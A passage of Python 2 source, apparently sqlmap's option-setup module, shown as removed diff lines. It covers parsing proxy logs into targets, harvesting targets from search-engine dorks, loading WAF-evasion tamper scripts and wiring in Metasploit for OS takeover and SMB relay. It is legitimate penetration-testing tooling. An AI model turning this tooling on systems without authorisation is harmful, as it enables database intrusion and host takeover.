LOCALHOST -from lib.core.settings import MAX_CONNECT_RETRIES -from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import NULL -from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS -from lib.core.settings import SITE -from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE -from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX -from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import SUPPORTED_OS -from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNION_CHAR_REGEX -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER -from lib.core.threads import getCurrentThreadData -from lib.core.update import update -from lib.parse.configfile import configFileParser -from lib.parse.payloads import loadBoundaries -from lib.parse.payloads import loadPayloads -from lib.parse.sitemap import parseSitemap -from lib.request.basic import checkCharEncoding -from lib.request.connect import Connect as Request -from lib.request.dns import DNSServer -from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler -from lib.request.httpshandler import HTTPSHandler -from lib.request.pkihandler import HTTPSPKIAuthHandler -from lib.request.rangehandler import HTTPRangeHandler -from lib.request.redirecthandler import SmartRedirectHandler -from lib.request.templates import getPageTemplate -from lib.utils.crawler import crawl -from lib.utils.deps import checkDependencies -from lib.utils.search import search -from lib.utils.purge import purge -from thirdparty.colorama.initialise import init as coloramainit -from thirdparty.keepalive import keepalive -from thirdparty.oset.pyoset import oset -from thirdparty.socks import socks -from xml.etree.ElementTree import ElementTree - -authHandler = urllib2.BaseHandler() -httpsHandler = HTTPSHandler() -keepAliveHandler = keepalive.HTTPHandler() -proxyHandler = urllib2.ProxyHandler() -redirectHandler = SmartRedirectHandler() -rangeHandler = HTTPRangeHandler() - -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target URL list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." - logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie, None)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - reqResList = [] - for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - port, request = match.groups() - request = request.decode("base64") - _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) - if _: - host = _.group(0).strip() - if not re.search(r":\d+\Z", host): - request = request.replace(host, "%s:%d" % (host, int(port))) - reqResList.append(request) - else: - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - request = re.sub(r"\A[^\w]+", "", request) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): - continue - - if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - headers = [] - - for index in xrange(len(lines)): - line = lines[index] - - if not line.strip() and index == len(lines) - 1: - break - - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None - - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: - data = "" - params = True - - elif match: - method = match.group(1) - url = match.group(2) - - if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)): - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+:", line): - key, value = line.split(":", 1) - value = value.strip().replace("\r", "").replace("\n", "") - - # Cookie and Host headers - if key.upper() == HTTP_HEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTP_HEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # headers and consider the following lines as - # POSTed data - if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): - headers.append((getUnicode(key), getUnicode(value))) - - if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): - params = True - - data = data.rstrip("\r\n") if data else data - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not host: - errMsg = "invalid format of a request file" - raise SqlmapSyntaxException, errMsg - - if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) - addedTargetUrls.add(url) - - checkFile(reqFile) - try: - with openFile(reqFile, "rb") as f: - content = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) - - if not addedTargetUrls: - errMsg = "unable to find usable request(s) " - errMsg += "in provided file ('%s')" % reqFile - raise SqlmapGenericException(errMsg) - -def _loadQueries(): - """ - Loads queries from 'xml/queries.xml' file. - """ - - def iterate(node, retVal=None): - class DictObject(object): - def __init__(self): - self.__dict__ = {} - - def __contains__(self, name): - return name in self.__dict__ - - if retVal is None: - retVal = DictObject() - - for child in node.findall("*"): - instance = DictObject() - retVal.__dict__[child.tag] = instance - if child.attrib: - instance.__dict__.update(child.attrib) - else: - iterate(child, instance) - - return retVal - - tree = ElementTree() - try: - tree.parse(paths.QUERIES_XML) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - for node in tree.findall("*"): - queries[node.attrib['value']] = iterate(node) - -def _setMultipleTargets(): - """ - Define a configuration parameter if we are running in multiple target - mode. - """ - - initialTargetsCount = len(kb.targets) - addedTargetUrls = set() - - if not conf.logFile: - return - - debugMsg = "parsing targets list from '%s'" % conf.logFile - logger.debug(debugMsg) - - if not os.path.exists(conf.logFile): - errMsg = "the specified list of targets does not exist" - raise SqlmapFilePathException(errMsg) - - if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) - - elif os.path.isdir(conf.logFile): - files = os.listdir(conf.logFile) - files.sort() - - for reqFile in files: - if not re.search("([\d]+)\-request", reqFile): - continue - - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) - - else: - errMsg = "the specified list of targets is not a file " - errMsg += "nor a directory" - raise SqlmapFilePathException(errMsg) - - updatedTargetsCount = len(kb.targets) - - if updatedTargetsCount > initialTargetsCount: - infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) - infoMsg += "(parameter unique) requests from the " - infoMsg += "targets list ready to be tested" - logger.info(infoMsg) - -def _adjustLoggingFormatter(): - """ - Solves problem of line deletition caused by overlapping logging messages - and retrieved data info in inference mode - """ - - if hasattr(FORMATTER, '_format'): - return - - def format(record): - message = FORMATTER._format(record) - message = boldifyMessage(message) - if kb.get("prependFlag"): - message = "\n%s" % message - kb.prependFlag = False - return message - - FORMATTER._format = FORMATTER.format - FORMATTER.format = format - -def _setRequestFromFile(): - """ - This function checks if the way to make a HTTP request is through supplied - textual file, parses it and saves the information into the knowledge base. - """ - - if not conf.requestFile: - return - - addedTargetUrls = set() - - conf.requestFile = safeExpandUser(conf.requestFile) - - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) - - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) - - _feedTargetsDict(conf.requestFile, addedTargetUrls) - -def _setCrawler(): - if not conf.crawlDepth: - return - - if not any((conf.bulkFile, conf.sitemapUrl)): - crawl(conf.url) - else: - if conf.bulkFile: - targets = getFileItems(conf.bulkFile) - else: - targets = parseSitemap(conf.sitemapUrl) - for i in xrange(len(targets)): - try: - target = targets[i] - crawl(target) - - if conf.verbose in (1, 2): - status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except Exception, ex: - errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex)) - logger.error(errMsg) - -def _doSearch(): - """ - This function performs search dorking, parses results - and saves the testable hosts into the knowledge base. - """ - - if not conf.googleDork: - return - - kb.data.onlyGETs = None - - def retrieve(): - links = search(conf.googleDork) - - if not links: - errMsg = "unable to find results for your " - errMsg += "search dork expression" - raise SqlmapGenericException(errMsg) - - for link in links: - link = urldecode(link) - if re.search(r"(.*?)\?(.+)", link): - kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) - elif re.search(URI_INJECTABLE_REGEX, link, re.I): - if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: - message = "do you want to scan only results containing GET parameters? [Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' - if not kb.data.onlyGETs or conf.googleDork: - kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) - - return links - - while True: - links = retrieve() - - if kb.targets: - infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "search dork expression, " - - if len(links) == len(kb.targets): - infoMsg += "all " - else: - infoMsg += "%d " % len(kb.targets) - - infoMsg += "of them are testable targets" - logger.info(infoMsg) - break - - else: - message = "sqlmap got %d results " % len(links) - message += "for your search dork expression, but none of them " - message += "have GET parameters to test for SQL injection. " - message += "Do you want to skip to the next result page? [Y/n]" - test = readInput(message, default="Y") - - if test[0] in ("n", "N"): - raise SqlmapSilentQuitException - else: - conf.googlePage += 1 - -def _setBulkMultipleTargets(): - if not conf.bulkFile: - return - - conf.bulkFile = safeExpandUser(conf.bulkFile) - - infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile - logger.info(infoMsg) - - if not os.path.isfile(conf.bulkFile): - errMsg = "the specified bulk file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) - - found = False - for line in getFileItems(conf.bulkFile): - if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: - found = True - kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) - - if not found and not conf.forms and not conf.crawlDepth: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - -def _setSitemapTargets(): - if not conf.sitemapUrl: - return - - infoMsg = "parsing sitemap '%s'" % conf.sitemapUrl - logger.info(infoMsg) - - found = False - for item in parseSitemap(conf.sitemapUrl): - if re.match(r"[^ ]+\?(.+)", item, re.I): - found = True - kb.targets.add((item.strip(), None, None, None, None)) - - if not found and not conf.forms and not conf.crawlDepth: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - -def _findPageForms(): - if not conf.forms or conf.crawlDepth: - return - - if conf.url and not checkConnection(): - return - - infoMsg = "searching for forms" - logger.info(infoMsg) - - if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)): - page, _ = Request.queryPage(content=True) - findPageForms(page, conf.url, True, True) - else: - if conf.bulkFile: - targets = getFileItems(conf.bulkFile) - elif conf.sitemapUrl: - targets = parseSitemap(conf.sitemapUrl) - elif conf.googleDork: - targets = [_[0] for _ in kb.targets] - kb.targets.clear() - for i in xrange(len(targets)): - try: - target = targets[i] - page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False) - findPageForms(page, target, False, True) - - if conf.verbose in (1, 2): - status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except KeyboardInterrupt: - break - except Exception, ex: - errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) - logger.error(errMsg) - -def _setDBMSAuthentication(): - """ - Check and set the DBMS authentication credentials to run statements as - another user, not the session user - """ - - if not conf.dbmsCred: - return - - debugMsg = "setting the DBMS authentication credentials" - logger.debug(debugMsg) - - match = re.search("^(.+?):(.*?)$", conf.dbmsCred) - - if not match: - errMsg = "DBMS authentication credentials value must be in format " - errMsg += "username:password" - raise SqlmapSyntaxException(errMsg) - - conf.dbmsUsername = match.group(1) - conf.dbmsPassword = match.group(2) - -def _setMetasploit(): - if not conf.osPwn and not conf.osSmb and not conf.osBof: - return - - debugMsg = "setting the takeover out-of-band functionality" - logger.debug(debugMsg) - - msfEnvPathExists = False - - if IS_WIN: - try: - import win32file - except ImportError: - errMsg = "sqlmap requires third-party module 'pywin32' " - errMsg += "in order to use Metasploit functionalities on " - errMsg += "Windows. You can download it from " - errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'" - raise SqlmapMissingDependence(errMsg) - - if not conf.msfPath: - def _(key, value): - retVal = None - - try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE - _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) - _ = OpenKey(_, key) - retVal = QueryValueEx(_, value)[0] - except: - logger.debug("unable to identify Metasploit installation path via registry key") - - return retVal - - conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location") - if conf.msfPath: - conf.msfPath = os.path.join(conf.msfPath, "msf3") - - if conf.osSmb: - isAdmin = runningAsAdmin() - - if not isAdmin: - errMsg = "you need to run sqlmap as an administrator " - errMsg += "if you want to perform a SMB relay attack because " - errMsg += "it will need to listen on a user-specified SMB " - errMsg += "TCP port for incoming connection attempts" - raise SqlmapMissingPrivileges(errMsg) - - if conf.msfPath: - for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): - if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")): - msfEnvPathExists = True - if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)): - kb.oldMsf = False - elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")): - kb.oldMsf = True - else: - msfEnvPathExists = False - - conf.msfPath = path - break - - if msfEnvPathExists: - debugMsg = "provided Metasploit Framework path " - debugMsg += "'%s' is valid" % conf.msfPath - logger.debug(debugMsg) - else: - warnMsg = "the provided Metasploit Framework path " - warnMsg += "'%s' is not valid. The cause could " % conf.msfPath - warnMsg += "be that the path does not exists or that one " - warnMsg += "or more of the needed Metasploit executables " - warnMsg += "within msfcli, msfconsole, msfencode and " - warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) - else: - warnMsg = "you did not provide the local path where Metasploit " - warnMsg += "Framework is installed" - logger.warn(warnMsg) - - if not msfEnvPathExists: - warnMsg = "sqlmap is going to look for Metasploit Framework " - warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) - - envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") - - for envPath in envPaths: - envPath = envPath.replace(";", "") - - if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): - msfEnvPathExists = True - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): - kb.oldMsf = False - elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")): - kb.oldMsf = True - else: - msfEnvPathExists = False - - if msfEnvPathExists: - infoMsg = "Metasploit Framework has been found " - infoMsg += "installed in the '%s' path" % envPath - logger.info(infoMsg) - - conf.msfPath = envPath - - break - - if not msfEnvPathExists: - errMsg = "unable to locate Metasploit Framework installation. " - errMsg += "You can get it at 'http://www.metasploit.com/download/'" - raise SqlmapFilePathException(errMsg) - -def _setWriteFile(): - if not conf.wFile: - return - - debugMsg = "setting the write file functionality" - logger.debug(debugMsg) - - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile - raise SqlmapFilePathException(errMsg) - - if not conf.dFile: - errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.wFileType = getFileType(conf.wFile) - -def _setOS(): - """ - Force the back-end DBMS operating system option. - """ - - if not conf.os: - return - - if conf.os.lower() not in SUPPORTED_OS: - errMsg = "you provided an unsupported back-end DBMS operating " - errMsg += "system. The supported DBMS operating systems for OS " - errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS]) - errMsg += "If you do not know the back-end DBMS underlying OS, " - errMsg += "do not provide it and sqlmap will fingerprint it for " - errMsg += "you." - raise SqlmapUnsupportedDBMSException(errMsg) - - debugMsg = "forcing back-end DBMS operating system to user defined " - debugMsg += "value '%s'" % conf.os - logger.debug(debugMsg) - - Backend.setOs(conf.os) - -def _setTechnique(): - validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) - validLetters = [_[0][0].upper() for _ in validTechniques] - - if conf.tech and isinstance(conf.tech, basestring): - _ = [] - - for letter in conf.tech.upper(): - if letter not in validLetters: - errMsg = "value for --technique must be a string composed " - errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters) - errMsg += "user's manual for details" - raise SqlmapSyntaxException(errMsg) - - for validTech, validInt in validTechniques: - if letter == validTech[0]: - _.append(validInt) - break - - conf.tech = _ - -def _setDBMS(): - """ - Force the back-end DBMS option. - """ - - if not conf.dbms: - return - - debugMsg = "forcing back-end DBMS to user defined value" - logger.debug(debugMsg) - - conf.dbms = conf.dbms.lower() - regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I) - - if regex: - conf.dbms = regex.group(1) - Backend.setVersion(regex.group(2)) - - if conf.dbms not in SUPPORTED_DBMS: - errMsg = "you provided an unsupported back-end database management " - errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT)) - errMsg += "If you do not know the back-end DBMS, do not provide " - errMsg += "it and sqlmap will fingerprint it for you." - raise SqlmapUnsupportedDBMSException(errMsg) - - for dbms, aliases in DBMS_ALIASES: - if conf.dbms in aliases: - conf.dbms = dbms - - break - -def _setTamperingFunctions(): - """ - Loads tampering functions from given script(s) - """ - - if conf.tamper: - last_priority = PRIORITY.HIGHEST - check_priority = True - resolve_priorities = False - priorities = [] - - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): - found = False - - tfile = tfile.strip() - - if not tfile: - continue - - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) - - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) - - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile - raise SqlmapSyntaxException(errMsg) - - dirname, filename = os.path.split(tfile) - dirname = os.path.abspath(dirname) - - infoMsg = "loading tamper script '%s'" % filename[:-3] - logger.info(infoMsg) - - if not os.path.exists(os.path.join(dirname, '__init__.py')): - errMsg = "make sure that there is an empty file '__init__.py' " - errMsg += "inside of tamper scripts directory '%s'" % dirname - raise SqlmapGenericException(errMsg) - - if dirname not in sys.path: - sys.path.insert(0, dirname) - - try: - module = __import__(filename[:-3].encode(sys.getfilesystemencoding())) - except (ImportError, SyntaxError), msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) - - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ - - for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": - found = True - kb.tamperFunctions.append(function) - function.func_name = module.__name__ - - if check_priority and priority > last_priority: - message = "it seems that you might have mixed " - message += "the order of tamper scripts. " - message += "Do you want to auto resolve this? [Y/n/q] " - test = readInput(message, default="Y") - - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): - resolve_priorities = False - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - check_priority = False - - priorities.append((priority, function)) - last_priority = priority - - break - elif name == "dependencies": - function() - - if not found: - errMsg = "missing function 'tamper(payload, **kwargs)' " - errMsg += "in tamper script '%s'" % tfile - raise SqlmapGenericException(errMsg) - - if kb.tamperFunctions and len(kb.tamperFunctions) > 3: - warnMsg = "using too many tamper scripts is usually not " - warnMsg += "a good idea" - logger.warning(warnMsg) - - if resolve_priorities and priorities: - priorities.sort(reverse=True) - kb.tamperFunctions = [] - - for _, function in priorities: - kb.tamperFunctions.append(function) - -def _setWafFunctions(): - """ - Loads WAF/IDS/IPS detecting functions from script(s) - """ - - if conf.identifyWaf: - for found in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")): - dirname, filename = os.path.split(found) - dirname = os.path.abspath(dirname) - - if filename == "__init__.py": - continue - - debugMsg = "loading WAF script '%s'" % filename[:-3] - logger.debug(debugMsg) - - if dirname not in sys.path: - sys.path.insert(0, dirname) - - try: - if filename[:-3] in sys.modules: - del sys.modules[filename[:-3]] - module = __import__(filename[:-3]) - except ImportError, msg: - raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) - - _ = dict(inspect.getmembers(module)) - if "detect" not in _: - errMsg = "missing function 'detect(get_page)' " - errMsg += "in WAF script '%s'" % found - raise SqlmapGenericException(errMsg) - else: - kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3]))) - -def _setThreads(): - if not isinstance(conf.threads, int) or conf.threads <= 0: - conf.threads = 1 - -def _setDNSCache(): - """ - Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. - """ - - def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] - - else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] - - if not hasattr(socket, "_getaddrinfo"): - socket._getaddrinfo = socket.getaddrinfo - socket.getaddrinfo = _getaddrinfo - -def _setSocketPreConnect(): - """ - Makes a pre-connect version of socket.connect - """ - - if conf.disablePrecon: - return - - def _(): - while kb.threadContinue and not conf.disablePrecon: - try: - for key in socket._ready: - if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE: - family, type, proto, address = key - s = socket.socket(family, type, proto) - s._connect(address) - with kb.locks.socket: - socket._ready[key].append(s._sock) - except KeyboardInterrupt: - break - except: - pass - finally: - time.sleep(0.01) - - def connect(self, address): - found = False - - key = (self.family, self.type, self.proto, address) - with kb.locks.socket: - if key not in socket._ready: - socket._ready[key] = [] - if len(socket._ready[key]) > 0: - self._sock = socket._ready[key].pop(0) - found = True - - if not found: - self._connect(address) - - if not hasattr(socket.socket, "_connect"): - socket._ready = {} - socket.socket._connect = socket.socket.connect - socket.socket.connect = connect - - thread = threading.Thread(target=_) - thread.start() - -def _setHTTPHandlers(): - """ - Check and set the HTTP/SOCKS proxy for all HTTP requests. - """ - global proxyHandler - - for _ in ("http", "https"): - if hasattr(proxyHandler, "%s_open" % _): - delattr(proxyHandler, "%s_open" % _) - - if conf.proxyList is not None: - if not conf.proxyList: - errMsg = "list of usable proxies is exhausted" - raise SqlmapNoneDataException(errMsg) - - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] - - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - - elif not conf.proxy: - if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: - proxyHandler.proxies = {} - - if conf.proxy: - debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" - logger.debug(debugMsg) - - try: - _ = urlparse.urlsplit(conf.proxy) - except Exception, ex: - errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) - raise SqlmapSyntaxException, errMsg - - hostnamePort = _.netloc.split(":") - - scheme = _.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None - - if len(hostnamePort) == 2: - try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block - - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) - - if conf.proxyCred: - _ = re.search("^(.*?):(.*?)$", conf.proxyCred) - if not _: - errMsg = "proxy authentication credentials " - errMsg += "value must be in format username:password" - raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) - - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - proxyHandler.proxies = {} - - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - socks.unwrapmodule(urllib2) - - if conf.proxyCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.proxyCred - else: - proxyString = "" - - proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} - - proxyHandler.__init__(proxyHandler.proxies) - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = filter(None, [proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler]) - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.authType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) - -def _setSafeVisit(): - """ - Check and set the safe visit options. - """ - if not any ((conf.safeUrl, conf.safeReqFile)): - return - - if conf.safeReqFile: - checkFile(conf.safeReqFile) - - raw = readCachedFileContent(conf.safeReqFile) - match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')]) - - if match: - kb.safeReq.method = match.group(1) - kb.safeReq.url = match.group(2) - kb.safeReq.headers = {} - - for line in raw[raw.find('\n') + 1:].split('\n'): - line = line.strip() - if line and ':' in line: - key, value = line.split(':', 1) - value = value.strip() - kb.safeReq.headers[key] = value - if key == HTTP_HEADER.HOST: - if not value.startswith("http"): - scheme = "http" - if value.endswith(":443"): - scheme = "https" - value = "%s://%s" % (scheme, value) - kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url) - else: - break - - post = None - - if '\r\n\r\n' in raw: - post = raw[raw.find('\r\n\r\n') + 4:] - elif '\n\n' in raw: - post = raw[raw.find('\n\n') + 2:] - - if post and post.strip(): - kb.safeReq.post = post - else: - kb.safeReq.post = None - else: - errMsg = "invalid format of a safe request file" - raise SqlmapSyntaxException, errMsg - else: - if not re.search("^http[s]*://", conf.safeUrl): - if ":443/" in conf.safeUrl: - conf.safeUrl = "https://" + conf.safeUrl - else: - conf.safeUrl = "http://" + conf.safeUrl - - if conf.safeFreq <= 0: - errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features" - raise SqlmapSyntaxException(errMsg) - -def _setPrefixSuffix(): - if conf.prefix is not None and conf.suffix is not None: - # Create a custom boundary object for user's supplied prefix - # and suffix - boundary = AttribDict() - - boundary.level = 1 - boundary.clause = [0] - boundary.where = [1, 